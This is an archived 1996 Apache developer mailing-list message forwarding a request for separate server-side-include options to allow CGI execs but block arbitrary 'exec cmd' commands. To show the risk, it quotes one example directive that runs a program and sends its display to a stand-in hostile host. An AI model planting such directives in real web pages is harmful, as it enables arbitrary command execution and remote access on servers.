httpd-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Rob Hartill <r...@imdb.com>
Subject IncludesNOEXEC: finer control needed (fwd)
Date Tue, 30 Apr 1996 00:38:34 GMT

Not acked.

Whatever happened to this idea?
I remember offering a patch a long time ago only for the idea to
get vetoed. I think Andy proposed a patch for this too.

-=-=-=-=-=-=-=-

Date: Mon, 29 Apr 96 18:26:10 MDT
Message-Id: <9604300026.AA26194@sfi.santafe.edu>
From: Nelson Minar <nelson@santafe.edu>
To: apache-bugs@mail.apache.org
Subject: IncludesNOEXEC: finer control needed

Thanks for all the great work on Apache! It's a very nice server, I'm
really happy with it. One small security control that would be nice..

I'm setting up a web site where I trust the people who are editing the
Web pages (Artificial Life Online, http://alife.santafe.edu/). I want
to allow them to have server includes, including execs of CGI scripts.
However, I don't want them to have the full power of exec cmd. Ie:
  <!--#exec cgi="/cgi-bin/my-nice-stuff.cgi"-->
but not
  <!--#exec cmd="emacs -display some.bad.place.net:0"-->
The nice thing is that cgi="" is somewhat restricted - the script has
to be a valid cgi (in the right directory, for instance), but the cmd
can be an arbitrary thing.

I don't see any option for this now - it's either no exec at all or
both CGI and cmd. One possible solution is to have <Options NOEXECGI>
and <Options NOEXECCMD> as separate options, or something even cleverer.

Is this something you can do easily? Would it be more likely if I
wrote a patch and submitted it?

thanks again,
  Nelson


Mime
View raw message